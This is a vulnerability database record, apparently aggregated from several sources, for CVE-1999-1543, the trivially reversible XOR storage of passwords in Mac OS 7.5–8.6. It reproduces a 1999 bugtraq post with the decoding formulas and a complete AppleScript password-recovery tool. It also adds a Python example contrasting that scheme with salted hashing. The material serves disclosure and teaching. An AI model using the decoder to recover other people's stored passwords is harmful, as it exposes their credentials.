CVE-1999-1543
CVSS 4.6
Published: 1999-07-10 00:00:00
Last modified: 2016-10-17 22:05:48

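[Original] MacOS uses weak encryption for passwords that are stored in the Users & Groups Data File.


[CNNVD] MacOS weak password encryption vulnerability (CNNVD-199907-013)

        MacOS contains a vulnerability. MacOS uses weak encryption to encrypt the passwords stored in the Users & Groups Data File.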

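- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]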

- CPE (affected platforms and products)

cpe:/o:apple:mac_os:8.0  Apple Mac OS 8.0
cpe:/o:apple:mac_os:8.1  Apple Mac OS 8.1
cpe:/o:apple:mac_os:7.6.1  Apple Mac OS 7.6.1
cpe:/o:apple:mac_os:7.5.3  Apple Mac OS 7.5.3
cpe:/o:apple:mac_os:8.6  Apple Mac OS 8.6
cpe:/o:apple:mac_os:7.6  Apple Mac OS 7.6
cpe:/o:apple:mac_os:8.5  Apple Mac OS 8.5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1543
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1543
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-013
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=93188174906513&w=2
(UNKNOWN)  BUGTRAQ  19990710 MacOS system encryption algorithm
http://marc.info/?l=bugtraq&m=93736667813924&w=2
(UNKNOWN)  BUGTRAQ  19990914 MacOS system encryption algorithm 3
http://www.securityfocus.com/bid/519
(VENDOR_ADVISORY)  BID  519

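- Vulnerability information

MacOS weak password encryption vulnerability
Medium  Design error
1999-07-10 00:00:00 2006-04-07 00:00:00
Local
        MacOS contains a vulnerability. MacOS uses weak encryption to encrypt the passwords stored in the Users & Groups Data File.

- Advisories and patches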

        Suggested by Vinnie Moscaritolo:
        A good fix is to not depend on passwords. There is a free plug-in for AppleShare IP available as Sample code from Apple's Developer Support Group that works around this problem. It is called PGPuam.
        PGPuam is available in our free tools section.

- Vulnerability information (19417)

Apple Mac OS <= 8 8.6 Weak Password Encryption Vulnerability (EDBID:19417)
osX local
1999-07-10 Verified
0 Dawid adix Adamski
N/A [Download]
source: http://www.securityfocus.com/bid/519/info

The encryption algorithm in MacOS system is simple and the password can be easily decoded.

Password is stored in Users & Groups Data File in Preferences folder. Offset is different on each system and depends on Users & Groups configuration, but it always lies after owner's username. It's not so difficult to find it using a hex editor, even if we don't know owner's username.

Here are some examples of encrypted passwords:
00 04 06 18 0D 0A 19 0B = stayaway
0A 1F 10 1B 00 07 75 1E = yellow
1C 1B 16 14 12 62 10 7B = owner
07 02 13 1A 1E 0F 1A 14 = turnpage
27 25 33 27 27 39 24 7E = Trustno1

AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh

where:
AA BB CC DD EE FF GG HH - encrypted password (hex)
aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)

aa=AA XOR 73H
bb=BB XOR AA XOR 70H
cc=CC XOR BB XOR 63H
dd=DD XOR CC XOR 67H
ee=EE XOR DD XOR 74H
ff=FF XOR EE XOR 70H
gg=GG XOR FF XOR 72H
hh=HH XOR GG XOR 6BH

An example:
Let's take 00 04 06 18 0D 0A 19 0B

00H XOR 73H = 73H = s
04H XOR 00H = 04H; 04H XOR 70H = 74H = t
06H XOR 04H = 02H; 02H XOR 63H = 61H = a
18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y

tested on:
MacOS 7.5.3, 7.5.5, 8.1, 8.5

Dawid adix Adamski <adixx@FRIKO4.ONET.PL> wrote an AppleScript to break passwords.

--------CUT HERE--------
(* MacOS Pass 2.1 by adix 15.06.99; Apple Script English *)
global lbin, bit1, bit2, bitk
set hex1 to text returned of (display dialog "Enter encrypted password (hex): " default answer "" buttons {" Ok "} default button " Ok " with icon stop)
-- the eight constants 73 70 63 67 74 70 72 6B written as one bit string
set Alicia to "0111001101110000011000110110011101110100011100000111001001101011"
set pass to ""
set lbin to ""
set razem to ""
set i to 1
set skok to 0
set ile to count items in hex1
if ile = 0 or ile = 1 then
	set pass to ""
else
	-- walk the input two hex digits (one byte) at a time
	repeat until (i > (ile - 1))
		set kodascii to 0
		set razem to ""
		set zn to items (i) thru (i + 1) in hex1
		set lbin to hex2bin(zn)
		-- XOR the current byte with its constant
		repeat with a from 1 to 8
			set bit1 to item (a + skok) of Alicia
			xor(a)
			set razem to {razem & bitk} as string
			if i < 2 then
				set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
			end if
		end repeat
		if i < 2 then
			set pass to {pass & (ASCII character kodascii)}
		else
			-- every byte after the first is also XORed with the previous input byte
			set zn to items (i - 2) thru (i - 1) in hex1
			set lbin to hex2bin(zn)
			repeat with a from 1 to 8
				set bit1 to item a of razem
				xor(a)
				set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
			end repeat
			set pass to {pass & (ASCII character kodascii)}
		end if
		set skok to skok + 8
		set i to i + 2
	end repeat
end if
display dialog "Password: " & pass & return & return & "by adix" buttons {" Ok "} default button " Ok " with icon note

-- convert a list of hex digits to a string of bits
on hex2bin(zn)
	set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111", "1000", "1001", "1010", "1011", "1100", "1101", "1110", "1111"}
	set t2hex to "0123456789ABCDEF"
	set bin to ""
	repeat with j in zn
		set t1 to j as string
		repeat with i from 1 to (count items in t2hex)
			if ((item i in t2hex) = t1) then
				set temp to (item i in temphex)
				exit repeat
			end if
		end repeat
		set bin to {bin & temp} as string
	end repeat
	return (bin)
end hex2bin

-- one-bit XOR of bit1 with bit a of lbin; the result is left in bitk
on xor(a)
	set bit2 to item a in lbin
	if bit1 = bit2 then
		set bitk to "0"
	else
		set bitk to "1"
	end if
end xor
		

- Vulnerability information

4993
Mac OS Users & Groups Data File Encryption Weakness
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability description

MacOS contains a flaw that may lead to an unauthorized password exposure. The password is stored in Users & Groups Data File in Preferences folder. The encryption used to protect the password is trivial to break, potentially exposing user passwords.

- Timeline

1999-07-10 Unknown
1999-07-10 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

- Vulnerability information

MacOS Weak Password Encryption Vulnerability
Design Error 519
No Yes
1999-07-10 12:00:00 2009-07-11 12:56:00
Posted to bugtraq on July 10, 1999 by Dawid adix Adamski <adixx@FRIKO4.ONET.PL>. Additional information from Vinnie Moscaritolo <vinnie@apple.com>.

- Affected software versions

Apple Mac OS 8 8.6
Apple Mac OS 8 8.5
Apple Mac OS 8 8.1
Apple Mac OS 8 8.0
Apple Mac OS 7 7.6.1
Apple Mac OS 7 7.6
Apple Mac OS 7 7.5.3

- Discussion

The encryption algorithm in MacOS system is simple and the password can be easily decoded.

Password is stored in Users & Groups Data File in Preferences folder. Offset is different on each system and depends on Users & Groups configuration, but it always lies after owner's username. It's not so difficult to find it using a hex editor, even if we don't know owner's username.

Here are some examples of encrypted passwords:
00 04 06 18 0D 0A 19 0B = stayaway
0A 1F 10 1B 00 07 75 1E = yellow
1C 1B 16 14 12 62 10 7B = owner
07 02 13 1A 1E 0F 1A 14 = turnpage
27 25 33 27 27 39 24 7E = Trustno1

AA BB CC DD EE FF GG HH = aa bb cc dd ee ff gg hh

where:
AA BB CC DD EE FF GG HH - encrypted password (hex)
aa bb cc dd ee ff gg hh - decrypted password in ASCII codes (hex)

aa=AA XOR 73H
bb=BB XOR AA XOR 70H
cc=CC XOR BB XOR 63H
dd=DD XOR CC XOR 67H
ee=EE XOR DD XOR 74H
ff=FF XOR EE XOR 70H
gg=GG XOR FF XOR 72H
hh=HH XOR GG XOR 6BH

An example:
Let's take 00 04 06 18 0D 0A 19 0B

00H XOR 73H = 73H = s
04H XOR 00H = 04H; 04H XOR 70H = 74H = t
06H XOR 04H = 02H; 02H XOR 63H = 61H = a
18H XOR 06H = 1EH; 1EH XOR 67H = 79H = y
0DH XOR 18H = 15H; 15H XOR 74H = 61H = a
0AH XOR 0DH = 07H; 07H XOR 70H = 77H = w
19H XOR 0AH = 13H; 13H XOR 72H = 61H = a
0BH XOR 19H = 12H; 12H XOR 6BH = 79H = y

tested on:
MacOS 7.5.3, 7.5.5, 8.1, 8.5

copied verbatim from a post to bugtraq by Dawid adix Adamski <adixx@FRIKO4.ONET.PL> on July 10, 1999
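
Added example, not part of the bugtraq post or of this database entry: it shows why the stored form is obfuscation rather than protection (fixed constants, no salt, fully determined by one known pair) next to a salted one-way record. The function names are hypothetical, the NUL padding to 8 bytes is inferred from the "yellow" and "owner" samples, and the PBKDF2 parameters are chosen for illustration.

```python
import hashlib
import hmac
import os

# Per-position constants taken from the formulas in the post.
KEY = bytes.fromhex("73 70 63 67 74 70 72 6B")

# The five stored/plaintext pairs listed in the post.
SAMPLES = {
    "00 04 06 18 0D 0A 19 0B": "stayaway",
    "0A 1F 10 1B 00 07 75 1E": "yellow",
    "1C 1B 16 14 12 62 10 7B": "owner",
    "07 02 13 1A 1E 0F 1A 14": "turnpage",
    "27 25 33 27 27 39 24 7E": "Trustno1",
}

def legacy_decode(stored):
    """The post's formulas: p[i] = c[i] XOR c[i-1] XOR KEY[i], with c[-1] = 0."""
    prev = b"\x00" + stored[:-1]
    return bytes(c ^ q ^ k for c, q, k in zip(stored, prev, KEY))

def legacy_encode(password):
    """Inverse of the formulas (assumption: short passwords are NUL-padded to 8)."""
    plain = password.encode("ascii")[:8].ljust(8, b"\x00")
    out, prev = bytearray(), 0
    for p, k in zip(plain, KEY):
        prev = p ^ k ^ prev
        out.append(prev)
    return bytes(out)

def constants_from_known_pair(stored, password):
    """A single known (stored, password) pair yields every constant."""
    plain = password.encode("ascii")[:8].ljust(8, b"\x00")
    prev = b"\x00" + stored[:-1]
    return bytes(c ^ q ^ p for c, q, p in zip(stored, prev, plain))

def salted_record(password, salt=None):
    """Contrast: random salt plus iterated one-way hash (PBKDF2-HMAC-SHA256)."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)

def salted_verify(password, salt, digest):
    """Recompute with the stored salt and compare in constant time."""
    return hmac.compare_digest(salted_record(password, salt)[1], digest)

if __name__ == "__main__":
    for hexed, pw in SAMPLES.items():
        assert legacy_encode(pw) == bytes.fromhex(hexed)
    print("legacy form is deterministic; constants:", KEY.hex(" "))
    print("salted records differ:", salted_record("owner")[1] != salted_record("owner")[1])
```

Two accounts with the same password get identical bytes under the legacy scheme, while the salted records differ and can only be checked by recomputation.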

- Exploit

Dawid adix Adamski <adixx@FRIKO4.ONET.PL> wrote an AppleScript to break passwords.


- Solution

Suggested by Vinnie Moscaritolo:

A good fix is to not depend on passwords. There is a free plug-in for AppleShare IP available as Sample code from Apple's Developer Support Group that works around this problem. It is called PGPuam.

PGPuam is available in our free tools section.

- Related references
